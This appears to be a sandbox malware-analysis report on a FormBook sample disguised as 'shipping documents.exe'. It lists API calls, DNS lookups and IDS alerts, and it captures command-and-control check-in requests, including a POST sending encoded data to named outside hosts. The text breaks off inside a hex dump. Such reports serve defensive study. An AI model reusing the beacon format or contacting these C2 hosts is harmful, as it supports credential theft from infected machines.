Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_006BF35D
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_006BF65E
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_006B3A2B
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_006B3D4E
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_006BBF27

Source: Joe Sandbox View	IP Address: 23.251.54.212 23.251.54.212
Source: Joe Sandbox View	IP Address: 23.251.54.212 23.251.54.212
Source: Joe Sandbox View	IP Address: 213.145.228.16 213.145.228.16

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006C25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_006C25E2

Source: global traffic	HTTP traffic detected: GET /w6qg/?uXTT=8FDHY8dP&jN=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1Ca0ipuJKNLUJAUyvRep5v3DJLNu0m2HizCt4wFiNb5RCLtMg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.hprlz.czConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /qe66/?jN=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv5wKSlbq5H9RfpzlUfmq/1+2mTftJij2S2gWTPvHx6aM7mw==&uXTT=8FDHY8dP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.catherineviskadi.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /xzzi/?uXTT=8FDHY8dP&jN=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/U7l2GiVWxU2JTINSgPIAJ4NvupNBog1mPljiQYHOMEGLOA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bfiworkerscomp.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /rm91/?uXTT=8FDHY8dP&jN=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WA/0x0l7m7B814c3LweorfxiP0L71SZjJ1PPNKkJ0Qx2crw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--fhq1c541j0zr.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /4hda/?jN=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG94cDJ5htquBO11HcjCOymydCfo0q1+e/CBcncmTCUQD5IVA==&uXTT=8FDHY8dP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--matfrmn-jxa4m.seConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /li0t/?uXTT=8FDHY8dP&jN=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfhgzxX5A8Pgwb+i5XvTgZRBJb2EypYfKSb86Vxi/qsGcisw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.anuts.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ei85/?jN=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXhR90PBHPgFvMy30KUVoXMjhVhw+zOJlVxwLOJt1WoLc5Mw==&uXTT=8FDHY8dP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.telwisey.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /aroo/?uXTT=8FDHY8dP&jN=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGB3kb0OJ7ghG7VUOTSl8sxinDCxUKcrHKEU0DEmNR7hjgMQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.sandranoll.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /tf44/?jN=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciy2erzG94aXY3gKTO0tUNpFmCuOm5+YFWh8hIX5dCVSC+GNg==&uXTT=8FDHY8dP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.gipsytroya.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /mooq/?uXTT=8FDHY8dP&jN=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGhsE2fBM2zTxwuji6F0Pbl1x/Uo4pPUilA6mApMPDsyvzdQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.helpers-lion.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /lfkn/?jN=gu3cG9GLpLv0C38agzY8Nc5HI9FnWTYycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT4CuBs9Ly3z32vNrKxrasIe0t0HCtUE4LbxPxJKDUCSn2XA==&uXTT=8FDHY8dP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.dmtxwuatbz.ccConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.hprlz.cz
Source: global traffic	DNS traffic detected: DNS query: www.catherineviskadi.com
Source: global traffic	DNS traffic detected: DNS query: www.hatercoin.online
Source: global traffic	DNS traffic detected: DNS query: www.fourgrouw.cfd
Source: global traffic	DNS traffic detected: DNS query: www.bfiworkerscomp.com
Source: global traffic	DNS traffic detected: DNS query: www.tinmapco.com
Source: global traffic	DNS traffic detected: DNS query: www.xn--fhq1c541j0zr.com
Source: global traffic	DNS traffic detected: DNS query: www.xn--matfrmn-jxa4m.se
Source: global traffic	DNS traffic detected: DNS query: www.anuts.top
Source: global traffic	DNS traffic detected: DNS query: www.telwisey.info
Source: global traffic	DNS traffic detected: DNS query: www.sandranoll.com
Source: global traffic	DNS traffic detected: DNS query: www.gipsytroya.com
Source: global traffic	DNS traffic detected: DNS query: www.helpers-lion.online
Source: global traffic	DNS traffic detected: DNS query: www.dmtxwuatbz.cc

Source: unknown

HTTP traffic detected: POST /qe66/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brHost: www.catherineviskadi.comOrigin: http://www.catherineviskadi.comCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 203Referer: http://www.catherineviskadi.com/qe66/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36Data Raw: 6a 4e 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 33 49 6b 48 66 4f 7a 51 52 51 57 48 76 72 44 52 74 54 78 59 79 54 31 65 2b 46 33 51 55 69 71 5a 6f 4c 61 2b 6e 38 3d Data Ascii: jN=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR73IkHfOzQRQWHvrDRtTxYyT1e+F3QUiqZoLa+n8=

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49713 -> 217.160.0.106:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49712 -> 217.160.0.106:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49744 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49728 -> 194.9.94.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49715 -> 217.160.0.106:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49717 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49732 -> 23.251.54.212:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49745 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49737 -> 213.145.228.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49722 -> 43.252.167.188:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49723 -> 43.252.167.188:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49743 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49731 -> 23.251.54.212:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49735 -> 199.192.19.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49727 -> 194.9.94.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49750 -> 172.67.210.102:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49748 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49733 -> 199.192.19.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49721 -> 43.252.167.188:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49720 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49747 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49719 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49711 -> 5.44.111.162:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49736 -> 199.192.19.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49746 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49716 -> 217.160.0.106:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49725 -> 194.9.94.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49734 -> 199.192.19.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49751 -> 172.67.210.102:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49718 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49738 -> 213.145.228.16:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49724 -> 43.252.167.188:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49726 -> 194.9.94.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49741 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49742 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49730 -> 23.251.54.212:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49729 -> 23.251.54.212:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49739 -> 213.145.228.16:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49740 -> 213.145.228.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49749 -> 172.67.210.102:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49752 -> 172.67.210.102:80

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 13 Aug 2024 04:42:52 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 13 Aug 2024 04:42:54 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 13 Aug 2024 04:42:57 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Tue, 13 Aug 2024 04:42:59 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 